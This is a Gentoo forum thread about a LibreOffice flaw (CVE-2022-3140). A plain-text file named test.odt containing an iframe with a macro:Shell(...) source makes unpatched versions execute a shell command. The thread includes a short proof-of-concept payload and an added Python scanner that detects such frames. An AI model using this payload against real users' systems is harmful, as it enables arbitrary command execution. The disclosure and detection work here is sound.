Gentoo Forums
Strange security bug in LibreOffice
mike155
Advocate


Joined: 17 Sep 2010
Posts: 4438
Location: Frankfurt, Germany

Posted: Thu Oct 20, 2022 3:26 pm    Post subject: Strange security bug in LibreOffice

Create a plain text file 'test.odt' with the contents below:
Code:
<iframe src='macro:Shell("whatever")'></iframe>

and run
Code:
lowriter test.odt

It's hard to believe - but LibreOffice executes "whatever". :evil:

The bug seems to be fixed in LibreOffice 7.3.6 and 7.4.1.

See: https://www.heise.de/news/Jetzt-updaten-LibreOffice-beseitigt-kritische-Makroluecke-7315313.html
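
Added example, not part of the original post and not LibreOffice code: a defensive scanner that flags frame elements whose target uses the macro: scheme, for both the plain-text file shown above and a real ODF package. The names FrameFinder, scan_bytes and make_odt are hypothetical, and treating draw:floating-frame / xlink:href as the ODF counterpart of the iframe is an assumption.

```python
import io
import zipfile
from html.parser import HTMLParser

# <iframe src> is the form shown in the post; the ODF floating-frame element
# (draw:floating-frame, xlink:href) is included here as an assumption.
FRAME_ATTRS = {"iframe": "src", "draw:floating-frame": "xlink:href"}
PLAIN = b"<iframe src='macro:Shell(\"whatever\")'></iframe>"  # the post's test file


class FrameFinder(HTMLParser):
    """Collect frame targets that use the macro: URI scheme."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        wanted = FRAME_ATTRS.get(tag)  # HTMLParser lowercases tag/attr names
        for name, value in attrs:
            if name != wanted or not value:
                continue
            # Drop whitespace and control characters before the scheme test.
            uri = "".join(ch for ch in value if ch > " ")
            if uri.lower().startswith("macro:"):
                self.hits.append((tag, value))


def scan_bytes(data):
    """Return [(element, target)] for macro: frame targets found in data."""
    parts = [data]  # plain text that only carries an .odt name, as in the post
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):  # real ODF package: scan every XML part
        with zipfile.ZipFile(buf) as zf:
            parts = [zf.read(n) for n in zf.namelist() if n.endswith(".xml")]
    hits = []
    for part in parts:
        finder = FrameFinder()
        finder.feed(part.decode("utf-8", errors="replace"))
        finder.close()
        hits.extend(finder.hits)
    return hits


def make_odt(content_xml):
    """Constructed sample: minimal in-memory ZIP holding only content.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("content.xml", content_xml)
    return buf.getvalue()
```

A non-empty result from scan_bytes is a reason to quarantine the file before it is opened in an unpatched LibreOffice.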
sabayonino
Veteran


Joined: 03 Jan 2012
Posts: 1045

Posted: Thu Oct 20, 2022 4:51 pm

Your security level for executing Macros is set to lower

Quote:
This document contains macros.

Macros may contain viruses. Execution of macros is disabled due to the current macro security setting in Tools - Options - LibreOffice - Security.

Therefore, some functionality may not be available.

_________________
LRS 64/32
mike155
Advocate


Joined: 17 Sep 2010
Posts: 4438
Location: Frankfurt, Germany

Posted: Thu Oct 20, 2022 5:12 pm

I tested with LibreOffice 7.0.4.2 / Debian and default settings. Macro Security level is "high". The bug is there.
fedeliallalinea
Administrator


Joined: 08 Mar 2003
Posts: 31447
Location: here

Posted: Thu Oct 20, 2022 5:24 pm

Moved from Gentoo Chat to Other Things Open Source.
Moved from Things Open Source to Other Networking & Security.
_________________
Questions are guaranteed in life; Answers aren't.
sabayonino
Veteran


Joined: 03 Jan 2012
Posts: 1045

Posted: Thu Oct 20, 2022 6:37 pm

CVE-2022-3140
_________________
LRS 64/32
All times are GMT